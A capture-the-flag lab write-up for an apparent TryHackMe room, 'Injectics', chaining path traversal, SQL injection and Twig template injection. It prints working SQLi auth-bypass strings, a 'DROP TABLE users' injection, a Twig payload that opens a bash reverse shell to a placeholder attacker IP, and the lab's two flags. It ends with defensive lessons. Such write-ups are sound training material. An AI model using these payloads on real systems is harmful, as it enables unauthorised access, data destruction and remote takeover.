Injectics
Injectics
Embedded Files
This lab demonstrates a full attack chain combining SQL injection, insecure credential handling, and server-side template injection in a Twig-based application.
For a detailed video walkthrough, you can watch the full demonstration on my YouTube channel.
A structured lab-based security assessment report is also available here.
Network Enumeration
Network Enumeration
Initial full port scan:
nmap -sC -sV -vv 10.10.189.106
Key findings:
22/tcp β OpenSSH
80/tcp β HTTP (Apache)
No additional exposed services.
Given limited attack surface, focus shifted entirely to the web application.
Web Enumeration & Surface Mapping
Web Enumeration & Surface Mapping
Directory brute-forcing:
gobuster dir -u http://IPADDRESS/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txtΒ
dirsearch -u http://IPADDRESS
Interesting findings:
/flags
/composer.json
Inspecting composer.json revealed:
"twig/twig": "2.14.0"
This is important because Twig 2.x is known to allow SSTI if user input is rendered insecurely.
Sensitive Log Exposure via Path Traversal
Sensitive Log Exposure via Path Traversal
Further manual inspection and fuzzing led to discovery of:
/mail.log
Using path traversal techniques:
../../../mail.log
The log contained:
Developer credentials
Superadmin credentials
Information about credential reset behavior triggered when the users table is dropped
This reduced attack complexity significantly.
β οΈ From an attacker perspective:
Plaintext credentials + internal logic disclosure = major recon advantage.
SQL Injection β Technical Breakdown
SQL Injection β Technical Breakdown
Target:
Target:
Login endpoint
Intercepted request in Burp:
Testing classic auth bypass payload:
' OR 1=1-- -
' || 1=1-- -
Exploitation Outcome:
Exploitation Outcome:
Authentication bypass
Access to DEV dashboard
Ability to manipulate users table
Dropping the table:
23;DROP TABLE users;
Triggered system behavior that restored default credentials (as revealed in mail.log).
This allowed login as:
superadmin@injectics.thm
FLAG 1
FLAG 1
THM{INJECTICS_ADMIN_PANEL_007}
Twig Server-Side Template Injection (SSTI)
Twig Server-Side Template Injection (SSTI)
Earlier reconnaissance revealed Twig usage.
Testing SSTI via profile update field:
Basic detection payload:
{{2*2}}
Response: 4 β Template execution confirmed.
Reverse Shell
Reverse Shell
Listener started:
nc -lnvp 4444
Twig RCE payload:
{{ ["bash -c 'exec bash -i >& /dev/tcp/ATTACKBOXIP/4445 0>&1'", ""] | sort('passthru') }}
Successful reverse shell established.
Post-exploitation:
ls -la
cd flags
FLAG 2
FLAG 2
THM{5735172b6c147f4dd649872f73e0fdea}
π Vulnerability Chain Analysis
π Vulnerability Chain Analysis
Individually:
SQL Injection β Critical
Exposed Log File β High
Logic Flaw (Credential Reset) β High
SSTI β Critical
Combined:
SQLi β Table Drop β Credential Restoration β Admin Access β SSTI β RCE
This demonstrates how chaining medium/high vulnerabilities escalates to full system compromise.
π§ Technical Takeaways
π§ Technical Takeaways
Prepared statements are non-negotiable in authentication logic.
Logs must never contain plaintext credentials.
Business logic tied to database state can introduce unexpected escalation paths.
Template engines must never render unsanitized user input.
Defense-in-depth cannot compensate for fundamental injection flaws.
Page updated
Google Sites
Report abuse